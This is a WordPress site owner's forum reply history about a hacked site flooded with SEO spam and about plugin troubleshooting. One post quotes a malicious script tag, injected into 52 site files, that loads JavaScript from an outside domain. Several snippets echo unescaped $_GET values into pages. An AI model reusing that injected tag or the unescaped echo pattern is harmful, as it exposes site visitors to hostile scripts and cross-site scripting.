GretarMagg
Forum Replies Created
-
Forum: Fixing WordPress
In reply to: Hack suspicionWhat do you mean by IP shown one of yours (Mileweb) ? ? I don’t know this IP address and they are all different from one another in the access log.
index.php is located in the root when the WP is set up and the path is the proper path for my set up. The folder was originally not named bb, I changed it some days ago.
I have set up a clean WP with the plugins and themes folder empty and the server is working ok. What should I try next ? Installing the theme again ?
Forum: Fixing WordPress
In reply to: Hack suspicionWell the thing is I’m working at the hosting company and I’m quite familiar with how things are working on the server. What happens when the site is enabled the idle process goes down to 0% and there is nothing you can do.
Can I send the error log to you? I do not want to post it in here. Well maby one line is ok, here is an example, the log is full of things like this
Forum: Fixing WordPress
In reply to: Hack suspicionResetting all plugins and the theme did not change anything. When I set the site back up live everything went down…
How can I see where this traffic is coming from ?Forum: Fixing WordPress
In reply to: Hack suspicionI can’t figure out where this traffic is coming from. In the webmaster tools I can see all these unrelated search words and URL’s.
Forum: Fixing WordPress
In reply to: Hack suspicionThe problem is that I can not scan this site because the server crashes when I put it back up.
What I’m doing now is resetting all plugins and the latest version of the theme to the site to try and see if that changes anything. I had previously scanned the theme and plugins for malicious code and found nothing.
Forum: Fixing WordPress
In reply to: Hack suspicionHi
I removed everything in the folder when I did the clean installation, all new files.
I have (I think) very carefully checked my database for dangerous code. There was one line in the .htaccess file that I removed and was suspicious.
Is there a name for this kind of hack ? The site is ok and does not look like it has malicious code on it… but this is just some attack on the site with search queries.
Forum: Plugins
In reply to: [Anti-Malware Security and Brute-Force Firewall] MW:SPAM:SEO spam problemHello
I installed your plugin yesterday and cleaned up my site (www.syrusson.is). But my site was hacked again early this morning and now with another URL.
<script type=”text/javascript” src=”https://www.clickevents.com.my/scripts/collect.js”></script>
Before the URL was the IP address. I updated the definition updates in the plugin this morning and ran a scan but the plugin found no issues (some potential threats). When I downloade the whole httpdocs folder to my computer and ran a search through all the files I saw that 52 files were infected and I removed the code from all the files. I guess the site is working now but if I could be sure the next attack will be blocked I would be a very happy man ??
Forum: Plugins
In reply to: [Product Enquiry for WooCommerce] Inquiry button is not workingI’m having the same problem. https://www.syrusson.is/vorur/gjafavarasmahlutir/spegill/
Nothing happens when the button is clicked.
I have the latest version 0.3.6 installed and also the newest WooCommerce version.
Forum: Plugins
In reply to: [Woody code snippets - Insert Header Footer Code, AdSense Ads] Use $_GETWell this is strange, when I do this, it works like a charm:
Your Booking ID : [insert_php] echo ''; print_r($_GET['booking_id']); echo ''; [/insert_php] Total amount of the booking : [insert_php] echo ''; print_r($_GET['total']); echo ''; [/insert_php] The date of your tour/tours : [insert_php] echo ''; print_r($_GET['date']); echo ''; [/insert_php] Item SKU and order quantity in the booking (quantity is after the colon) : [insert_php] echo ''; print_r($_GET['sku']); echo ''; [/insert_php]
Forum: Plugins
In reply to: [Woody code snippets - Insert Header Footer Code, AdSense Ads] Use $_GETOk, no problem, I can maby try to write out the values in the array with the php code that worked.
Forum: Plugins
In reply to: [Woody code snippets - Insert Header Footer Code, AdSense Ads] Use $_GETNo, strangely enough this does not work… I even tried to set up this echo
stuff before but that did not change anything. [insert_php] echo '
'; echo('Booking ID: ' . $_GET['booking_id'] . ''); echo '
‘;
echo(‘Total: ‘ . $_GET[‘total’] . ‘
‘);echo(‘Date: ‘ . $_GET[‘date’] . ‘
‘);echo(‘SKU: ‘ . $_GET[‘sku’]);
[/insert_php]
Forum: Plugins
In reply to: [Woody code snippets - Insert Header Footer Code, AdSense Ads] Use $_GETYES ! That writes out
Array ( [booking_id] => QYFA-250314 [total] => 178.00 [date] => 2014-06-02 [sku] => thegoldencir:2 )
on the page.
Forum: Plugins
In reply to: [Woody code snippets - Insert Header Footer Code, AdSense Ads] Use $_GETOk, I did that and this is what appears on the page
booking_id=QYFA-250314&total=178.00&date=2014-06-02&sku=thegoldencir:2
Forum: Plugins
In reply to: [Woody code snippets - Insert Header Footer Code, AdSense Ads] Use $_GETI have my key quotes in apostrophes. But still nothing appears on my page…
echo $_SERVER[‘booking_id’];
is not working either. Below is my complete code:
Your booking ID: [insert_php] echo $_SERVER['booking_id']; [/insert_php] Total amount of the booking: [insert_php] echo $_SERVER['total']; [/insert_php] The date of your tour/tours: [insert_php] echo $_GET['date']; [/insert_php] Item SKU and order quantity in the booking: [insert_php] echo $_GET['sku']; [/insert_php] [insert_php] $string = "PHP code to test"; echo $string; [/insert_php]
As you can see at the bottom I’m checking if the string PHP code to test is written out and that works out fine on the page.
Please note that I have tried $_SERVER and $_GET
Forum: Plugins
In reply to: [Woody code snippets - Insert Header Footer Code, AdSense Ads] Use $_GETIt is not working for me, I have this URL for example and this php code below:
Your booking ID:
[insert_php] echo $_GET[booking_id]; [/insert_php]
Total amount of the booking:[insert_php] echo $_GET[‘total’]; [/insert_php]
etc. but nothing is visible on the page.